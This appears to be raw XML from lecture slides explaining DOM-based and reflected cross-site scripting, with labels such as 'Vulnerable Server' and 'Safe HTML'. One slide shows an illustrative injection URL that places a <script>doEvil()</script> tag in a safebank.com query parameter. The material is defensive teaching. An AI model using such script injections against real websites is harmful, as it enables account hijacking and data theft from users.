                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Safe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="object 13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8343729" y="2741577"/>
            <a:ext cx="3734647" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="191342" marR="6773" indent="-175256">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>params </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-527" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>safe</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>fashion,</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>ignores</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="850032"/>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>malicious</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>param</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="object 14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3643544" y="333396"/>
            <a:ext cx="4902200" cy="920830"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>DOM-Based</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-127" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="object 15"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1932066" y="1440405"/>
            <a:ext cx="1998980" cy="2860887"/>
            <a:chOff x="1449049" y="1080303"/>
            <a:chExt cx="1499235" cy="2145665"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>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7" name="object 17"/>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8" name="object 18"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="2211882" y="1080303"/>
              <a:ext cx="736066" cy="808859"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="19" name="object 19"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3009053" y="3877901"/>
            <a:ext cx="7378700" cy="1542627"/>
            <a:chOff x="2256789" y="2908426"/>
            <a:chExt cx="5534025" cy="1156970"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6911421" y="2908426"/>
              <a:ext cx="879266" cy="1156931"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="object 21"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2275839" y="3509035"/>
              <a:ext cx="4620895" cy="6350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="4620895" h="6350">
                  <a:moveTo>
                    <a:pt x="0" y="6324"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4620641" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="22" name="object 22"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6782084" y="3442525"/>
              <a:ext cx="114935" cy="133350"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="114934" h="133350">
                  <a:moveTo>
                    <a:pt x="190" y="133350"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="114401" y="66509"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="38100">
              <a:solidFill>
                <a:srgbClr val="C0C0C0"/>
              </a:solidFill>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr sz="2400"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="object 23"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2948466" y="2289212"/>
            <a:ext cx="5058833" cy="1014807"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="662923" marR="2086981"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safebank.com/welcome.php?query=&lt;script&gt;doEvil()&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="object 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="631616" y="5233605"/>
            <a:ext cx="390313" cy="242866"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="object 25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="367131" y="4388545"/>
            <a:ext cx="2479885" cy="1144692"/>
            <a:chOff x="275348" y="3291408"/>
            <a:chExt cx="1859914" cy="858519"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="object 26"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId5" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="275348" y="3297587"/>
              <a:ext cx="683679" cy="683672"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="27" name="object 27"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId6" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="936193" y="3301834"/>
              <a:ext cx="1157359" cy="785837"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="object 28"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="929982" y="329617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9" name="object 29"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId7" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="897636" y="3418331"/>
              <a:ext cx="1237487" cy="731519"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="object 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>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31" name="object 31"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="943584" y="3441915"/>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32" name="object 32"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3583284" y="411795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sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="object 33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2134984" y="4668628"/>
            <a:ext cx="50800"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4" name="object 34"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1217168" y="4630908"/>
            <a:ext cx="1609513" cy="451273"/>
            <a:chOff x="912875" y="3473180"/>
            <a:chExt cx="1207135" cy="338455"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="object 35"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId8" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1653540" y="3473180"/>
              <a:ext cx="460235" cy="150866"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="object 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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7" name="object 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1699729" y="3496182"/>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8" name="object 38"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId9" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1860794" y="3604245"/>
              <a:ext cx="251459" cy="156971"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="39" name="object 39"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId10" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="912875" y="3700251"/>
              <a:ext cx="1207007" cy="111252"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="object 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="954683" y="3734722"/>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41" name="object 41"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2104214" y="4752069"/>
            <a:ext cx="804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a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>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42" name="object 42"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1360745" y="4695415"/>
            <a:ext cx="1460500" cy="220133"/>
            <a:chOff x="1020558" y="3521561"/>
            <a:chExt cx="1095375" cy="165100"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="43" name="object 43"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId11" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1655064" y="3535667"/>
              <a:ext cx="460247" cy="150873"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="44" name="object 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>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5" name="object 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1701266" y="3558768"/>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6" name="object 46"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId12" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1020558" y="3521561"/>
              <a:ext cx="288010" cy="52552"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="object 47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1641754" y="5158094"/>
            <a:ext cx="1134533"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8" name="object 48"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1204976" y="4941817"/>
            <a:ext cx="496147" cy="591820"/>
            <a:chOff x="903732" y="3706362"/>
            <a:chExt cx="372110" cy="443865"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="49" name="object 49"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId13" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="903732" y="3706362"/>
              <a:ext cx="371855" cy="443476"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="50" name="object 50"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId14" cstate="print"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>
              <a:ext cx="277418" cy="348907"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="51" name="object 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="949134" y="3729177"/>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52" name="object 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="960221" y="3762463"/>
              <a:ext cx="233679" cy="154305"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="233680" h="154304">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53" name="object 53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1259096" y="5060638"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="54" name="object 54"/>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3" name="object 3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="104985" y="30304"/>
            <a:ext cx="843280" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-120" dirty="0"/>
              <a:t>T</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>ype</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="7" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2400"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="object 4"/>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5" name="object 5"/>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6" name="object 6"/>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sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 7"/>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8" name="object 8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8748505" y="5418056"/>
            <a:ext cx="2237740" cy="386430"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Vulnerable</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8343730" y="2741609"/>
            <a:ext cx="3734647" cy="1125094"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="16933" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="191342" marR="6773" indent="-175256">
              <a:spcBef>
                <a:spcPts val="133"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>3. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Server </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A7A8A7"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
